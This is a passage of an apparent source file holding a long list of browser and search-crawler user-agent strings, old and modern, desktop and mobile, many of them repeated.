	'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
	'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
	'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
	'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
	'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
	'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
	'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
	'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
	'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
	'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
	'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
	'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
	'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
	'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
	'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
	'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
	'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
	'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
	'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
	'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
	'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
	'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
	'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
	'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
	'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
	'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
	'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
	'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
	'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
	'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
	'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
	'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
	'Mozilla/4.0 (compatible; Arachmo)',
	'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
	'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
	'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
	'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
	'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
	'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
	'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
	'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
	'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
	'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
	'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
	'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
	'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
	'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
	'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
	'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
	'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
	'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
	'Mozilla/5.0 (PLAYSTATION 3; 3.55)',
	'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
	'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
	'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
	'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
	'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
	'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
	'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
	'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
	'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
	'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
	'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
	'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
	'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
	'Googlebot/2.1 (http://www.googlebot.com/bot.html)',
	'Opera/9.20 (Windows NT 6.0; U; en)',
	'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
	'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
	'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
	'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
	'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
	'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
	'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)',
	'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
	'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
	'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
	'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
	'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
	'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
	'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
	'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
	'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
	'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
	'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
	'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
	'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
	'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
	'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
	'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
	'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
	'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
	'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
	'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
	'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
	'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
	'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
	'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
	'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
	'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
	'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
	'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
	'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
	'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
	'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
	'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
	'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
	'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
	'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
	'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
	'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
	'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
	'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
	'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
	'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
	'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
	'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
	'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
	'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
	'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
	'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
	'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
	'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
	'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
	'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
	'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
	'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
	'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
	'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
	'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
	'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
	'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
	'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
	'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
	'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1',
	'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1',
	'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12',
	'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
	'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
	'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
	'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36',
	'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
	'Mozilla/5.0 (Linux; Android 8.0; SAMSUNG SM-G935F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30',
	'Mozilla/5.0 (Linux; Android 5.1; A1601 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 6.0; MYA-L22 Build/HUAWEIMYA-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 7.1; vivo 1716 Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 7.1; vivo 1904) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 7.1; Xiaomi M2012K11AG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.2 Chrome/71.0.3578.99 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 9; OPPO CPH2185) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36',
	'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
	'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A515F/DSN Build/U4EUC8) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/91.0.4472.77 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36',
	'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/90.0.4430.216 Mobile/15E148 Safari/604.1',
	'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36',
	'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F',
	'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10.0; Redmi Note 8T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10; BASIC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36',
	'Mozilla/5.0 (Linux; Android 10; Nokia 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36 (Ecosia android@88.0.4324.181)',
